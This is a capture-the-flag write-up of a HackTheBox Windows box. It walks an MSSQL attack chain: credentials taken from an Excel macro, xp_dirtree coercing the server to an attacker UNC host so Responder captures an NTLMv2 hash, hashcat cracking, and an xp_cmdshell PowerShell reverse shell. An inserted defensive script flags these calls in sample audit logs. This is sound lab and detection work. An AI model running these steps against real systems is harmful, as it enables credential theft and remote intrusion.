## Box Info

| Field | Value |
|---|---|
| Platform | HackTheBox |
| Difficulty | Medium |
| OS | Windows |
| Key Techniques | MSSQL Exploitation, VBA Macro Creds, Responder NTLMv2 Steal, xp_cmdshell |
## Attack Path Summary
SMB guest access to “Reports” share → downloaded Excel file with VBA macro containing MSSQL credentials (reporting:PcwTWTHRwryjc$c6) → connected to MSSQL with -windows-auth flag → reporting user couldn’t run xp_cmdshell → used Responder + xp_dirtree to steal NTLMv2 hash for the MSSQL service account → cracked hash → reconnected as service account with sysadmin role → enabled xp_cmdshell → reverse shell → privesc.
## Enumeration

```bash
sudo nmap -Pn -p- --min-rate=1000 -T4 -oN fast_tcp.txt $ip
```
| Port | Service | Notes |
|---|---|---|
| 445 | SMB | Guest access to Reports share |
| 1433 | MSSQL | Primary target for the foothold |
## SMB — Excel File with Macro

Found an Excel file in the Reports share. Opened it and checked the VBA macros — found hardcoded MSSQL credentials.

Creds from macro: `reporting:PcwTWTHRwryjc$c6`
## Foothold — MSSQL → Responder → Shell

### First Connection

```bash
impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@$ip -windows-auth
# Connected! But the reporting user can't enable xp_cmdshell — not sysadmin
```

Important: the `-windows-auth` flag was required. SQL auth and Windows auth are different login paths; without this flag the connection fails.

Also: the password contains `$`. Use single quotes in bash, otherwise the shell tries to expand `$c6` as a variable.
### Hash Steal — xp_dirtree + Responder

Since `reporting` can't run `xp_cmdshell`, I used `xp_dirtree` to make the SQL server connect back to my Responder and steal the NTLMv2 hash of the service account.

```bash
# On Kali — start Responder
sudo responder -I tun0
```

```sql
-- In MSSQL — trigger a connection back to us
xp_dirtree '\\KALI_IP\share'
-- Responder catches the NTLMv2 hash for the MSSQL service account
```
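From the defender's side, the coercion above leaves a clear trace: a non-sysadmin login calling a file-system extended procedure with a UNC path to a host the server has no business talking to. The following is an added detection example, not code from the writeup, run over a constructed, simplified audit format (`<time> login=<name> stmt=<T-SQL>`); the log layout, login names, allowlist and sample IP are all assumptions.

```python
import re

# Constructed sample audit records in an assumed simplified format; not real logs from the box.
SAMPLE_AUDIT = """\
2024-01-01T10:00:01 login=reporting stmt=SELECT name FROM sys.databases
2024-01-01T10:00:05 login=reporting stmt=EXEC master..xp_dirtree '\\\\10.10.14.7\\share'
2024-01-01T10:00:09 login=reporting stmt=xp_fileexist '\\\\fileserver01\\reports\\q1.xlsx'
2024-01-01T10:01:00 login=svc_mssql stmt=EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE
2024-01-01T10:01:02 login=svc_mssql stmt=EXEC xp_cmdshell 'whoami'
"""

# Hosts the SQL Server is legitimately allowed to reach over SMB (assumed allowlist).
TRUSTED_UNC_HOSTS = {"fileserver01"}

# Extended procedures that make the server open an outbound SMB session to a UNC path.
UNC_PROCS = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b.*?'\\\\([^\\']+)", re.I)
CMDSHELL_ENABLE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
CMDSHELL_USE = re.compile(r"\bxp_cmdshell\b", re.I)
LINE = re.compile(r"^(\S+) login=(\S+) stmt=(.*)$")


def classify(stmt):
    """Return an alert reason for a single T-SQL statement, or None if benign."""
    m = UNC_PROCS.search(stmt)
    if m and m.group(2).lower() not in TRUSTED_UNC_HOSTS:
        return f"outbound SMB to untrusted host {m.group(2)} via {m.group(1)} (possible NTLM coercion)"
    if CMDSHELL_ENABLE.search(stmt):
        return "xp_cmdshell enabled via sp_configure"
    if CMDSHELL_USE.search(stmt):
        return "xp_cmdshell execution"
    return None


def find_alerts(audit_text):
    """Parse audit lines and return (timestamp, login, reason) for each suspicious statement."""
    alerts = []
    for line in audit_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        ts, login, stmt = m.groups()
        reason = classify(stmt)
        if reason:
            alerts.append((ts, login, reason))
    return alerts


if __name__ == "__main__":
    for ts, login, reason in find_alerts(SAMPLE_AUDIT):
        print(f"{ts} {login}: {reason}")
```

Only the `xp_fileexist` call to the allowlisted file server stays quiet; the UNC call to an unknown host and the `xp_cmdshell` enable/use pairs are the three events worth paging on.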
### Crack the Hash

```bash
hashcat -m 5600 ntlmv2_hash.txt /usr/share/wordlists/rockyou.txt
# Cracked the service account password
```
### Reconnect as Sysadmin → Shell

```bash
# Reconnect with the service account (sysadmin privileges)
impacket-mssqlclient svc_account:'password'@$ip -windows-auth
```

```sql
-- Enable xp_cmdshell (mssqlclient helper command)
enable_xp_cmdshell
-- Reverse shell
xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'
```
## What I Learned

- Always try `-windows-auth` with `impacket-mssqlclient`. SQL auth and Windows auth are different; if one fails, try the other.
- Passwords with `$` need single quotes in bash. `'PcwTWTHRwryjc$c6'` works, `"PcwTWTHRwryjc$c6"` doesn't, because bash interprets `$c6` as a variable.
- VBA macros in Office files are a common credential source on CTF boxes and in real life. Always check SMB shares for Excel/Word files and inspect their macros.
- `xp_dirtree` + Responder = steal an NTLMv2 hash when `xp_cmdshell` is denied. The SQL server makes an SMB connection to your machine, and Responder captures the authentication hash. Hashcat mode 5600 cracks NTLMv2.
- Pattern: "MSSQL access but no xp_cmdshell? Use xp_dirtree + Responder to steal the service account hash. Crack it, reconnect with sysadmin rights."